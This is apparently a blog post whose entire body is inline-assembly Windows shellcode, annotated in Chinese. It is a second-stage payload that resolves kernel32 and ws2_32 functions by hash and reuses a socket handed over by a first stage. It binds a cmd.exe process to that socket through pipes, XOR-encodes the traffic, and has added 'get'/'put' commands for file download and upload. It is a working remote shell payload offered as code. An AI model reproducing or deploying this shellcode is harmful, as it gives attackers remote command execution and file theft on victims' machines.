- // shellcode function
- void ShellCode()
- {
- __asm{
- PROC_BEGIN //C macro to begin proc
- jmp locate_addr
- func_start:
- pop edi ; get eip
- mov dword ptr [edi+_hsck], eax //保存stage1传来的socket handle
- mov eax, fs:30h
- mov eax, [eax+0Ch]
- mov esi, [eax+1Ch]
- lodsd
- mov ebp, [eax+8] ; base address of kernel32.dll
- mov esi, edi
-
- push _Knums
- pop ecx
- GetKFuncAddr: ; find functions from kernel32.dll
- call find_hashfunc_addr
- loop GetKFuncAddr
- push 3233h
- push 5F327377h ; ws2_32
- push esp
- call dword ptr [esi+_LoadLibraryA]
- mov ebp, eax ; base address of ws2_32.dll
- push _Wnums
- pop ecx
-
- GetWFuncAddr: ; find functions from ws2_32.dll
- call find_hashfunc_addr
- loop GetWFuncAddr
-
- push 1 ; sa.inherit=true
- push 0 ; sa.descriptor=NULL
- push 0x0C ; sa.sizeof(sa)=0x0c
- mov ebx, esp
-
- push 0xff
- push ebx
- lea edx, [esi+_hin0]
- push edx
- add edx, 4
- push edx
- call dword ptr [esi+_CreatePipe]
-
- push 0x305C
- push 0x65706970
- push 0x5C2E5C5C ; "\\.\pipe\0"
- mov edi, esp
-
- xor eax, eax
- push eax
- push eax
- push eax
- push eax
- push 0xff ; UNLIMITED_INSTANCES
- push eax ; TYPE_BYTE|READMODE_BYTE|WAIT
- push 0x40000003 ; ACCES_DUPLEX|FLAG_OVERLAPPED
- push edi ; pip="\\.\pipe\0"
- call dword ptr [esi+_CreateNamedPipeA]
- mov [esi+_hout1], eax
-
- xor eax, eax
- push eax
- push eax
- push 3 ; OPEN_EXISTING
- push ebx ; lap
- push eax
- push 0x02000000 ; MAXIMUM_ALLOWED
- push edi ; pip="\\.\pipe\0"
- call dword ptr [esi+_CreateFileA]
- mov [esi+_hout0], eax
-
- push 646D63h ; "cmd"
- lea edx, [esp]
- sub esp, 54h
- mov edi, esp
- push 14h
- pop ecx
- xor eax, eax
- stack_zero:
- mov [edi+ecx*4], eax
- loop stack_zero
- mov byte ptr [edi+10h], 44h ; si.cb = sizeof(si)
- inc byte ptr [edi+3Ch]
- inc byte ptr [edi+3Dh] ; si.flg=USESHOWWINDOW|USESTDHANDLES
- push [esi+_hin1]
- pop ebx
- mov [edi+48h], ebx ; si.stdinput
- push [esi+_hout0]
- pop ebx
- mov [edi+4Ch], ebx ; si.stdoutput
- mov [edi+50h], ebx ; si.stderror
- lea eax, [edi+10h]
- push edi
- push eax
- push ecx
- push ecx
- push ecx
- push 1 ; inherit=TRUE
- push ecx
- push ecx
- push edx ; "cmd"
- push ecx
- call dword ptr [esi+_CreateProcessA]
-
- push [edi]
- pop dword ptr [esi+_pi0]
- push [edi+4]
- pop dword ptr [esi+_pi1]
-
- push [esi+_hin1]
- call dword ptr [esi+_CloseHandle]
- push [esi+_hout0]
- call dword ptr [esi+_CloseHandle]
-
- add esp, 0x6C ; free sa struct and "\\.\pipe\0" string and si struct
-
- xor eax, eax
- push eax
- push 1
- push 1
- push eax
- call dword ptr [esi+_CreateEventA]
- mov [esi+_epip], eax
-
- xor ebx, ebx
- mov [esi+_lap+0x0C], ebx
- mov [esi+_lap+0x10], eax
-
- call dword ptr [esi+_WSACreateEvent] // WSACreateEvent();
- mov [esi+_esck], eax
- mov dword ptr [esi+_flg], 0
- k1:
- push 0x21 ; FD_READ|FD_CLOSE
- push [esi+_esck]
- push [esi+_hsck]
- call dword ptr [esi+_WSAEventSelect] // WSAEventSelect(_hsck, _esck, FD_READ|FD_CLOSE);
- xor eax, eax
- dec eax
- push eax
- inc eax
- push eax
- lea ebx, [esi+_epip]
- push ebx
- push 2
- call dword ptr [esi+_WaitForMultipleObjects] // WaitForMultipleObjects(2, _epip, FALSE, INFINITE);
- push eax
-
- lea ebx, [esi+_sbuf]
- push ebx
- push [esi+_esck]
- push [esi+_hsck]
- call dword ptr [esi+_WSAEnumNetworkEvents] // WSAEnumNetworkEvents(_hsck, _esck, _sbuf);
-
- push 0
- push dword ptr [esi+_esck]
- push dword ptr [esi+_hsck]
- call dword ptr [esi+_WSAEventSelect] // WSAEventSelect(_hsck, _esck, 0);
-
- push 0
- push esp
- push 0x8004667e
- push [esi+_hsck]
- call dword ptr [esi+_ioctlsocket]
- pop eax
-
- pop ecx ;
- jecxz k2
- dec ecx
- jnz k5
-
- push 0
- push 0x40
- lea edx, [esi+_sbuf]
- push edx
- push [esi+_hsck]
- call dword ptr [esi+_recv]
-
- lea edx, [esi+_sbuf]
- push eax
- pop ecx ;ecx字节数
- call xor_data
-
- //+-------------------------------------------
- // Add file download and upload function
- // 2004-06-09
- //
- // san
- //+-------------------------------------------
- cmp dword ptr [esi+_sbuf], 0xFF746567 ; "get "
- jz get_file
- cmp dword ptr [esi+_sbuf], 0xFF747570 ; "put "
- jz put_file
- cmp DWORD ptr [esi+_sbuf], 0x20786573 ; "*** " ***加空格, 安全退出
- jz k5
-
- restore:
- push 0
- lea ebx, [esi+_cnt]
- push ebx
- push eax ; size
- lea ebx, [esi+_sbuf]
- push ebx
- push [esi+_hin0]
- call [esi+_WriteFile] // WriteFile(_hin0, _sbuf, len, _cnt);
-
- k2:
- mov ecx, [esi+_flg]
- jecxz k3
- push eax
- lea ebx, [esi+_cnt]
- push ebx
- lea ebx, [esi+_lap]
- push ebx
- push [esi+_hout1]
- call dword ptr [esi+_GetOverlappedResult]
- xchg eax, ecx
- jecxz k5
- jmp k4
-
- k3:
- lea ebx, [esi+_lap]
- push ebx
- lea ebx, [esi+_cnt]
- push ebx
- push 0x40
- lea ebx, [esi+_pbuf]
- push ebx
- push [esi+_hout1]
- call dword ptr [esi+_ReadFile]
- inc dword ptr [esi+_flg]
- test eax, eax
- jz k1
-
- k4:
- lea edx, [esi+_pbuf]
- push [esi+_cnt]
- pop ecx
- call xor_data
-
- dec dword ptr [esi+_flg]
- push 0
- mov ebx, [esi+_cnt]
- push ebx
- lea ebx, [esi+_pbuf]
- push ebx
- push [esi+_hsck]
- call dword ptr [esi+_send]
- jmp k1
- k5:
- //int 3
- //push 0 //应该可以没有
- push [esi+_pi0] // 进程 handler
- call dword ptr [esi+_TerminateProcess] //结束掉cmd
- // call dword ptr [esi+_ExitThread]
- // call DWORD ptr [esi+_ExitProcess]
-
- push [esi+_pi0]
- push [esi+_pi1]
- push [esi+_hout1]
- push [esi+_hin0]
- call dword ptr [esi+_CloseHandle]
- call dword ptr [esi+_CloseHandle]
- call dword ptr [esi+_CloseHandle]
- call dword ptr [esi+_CloseHandle]
-
- push [esi+_hsck]
- call dword ptr [esi+_closesocket]
-
- // xor eax, eax
- // dec eax
- // push eax
- // call dword ptr [esi+_TerminateProcess] 结束当前进程
- // call dword ptr [esi+_ExitThread]
- // 返回stage1 恢复栈平衡
- //int 3
- add esp, 8h
- retn
阅读(1246) | 评论(0) | 转发(0) |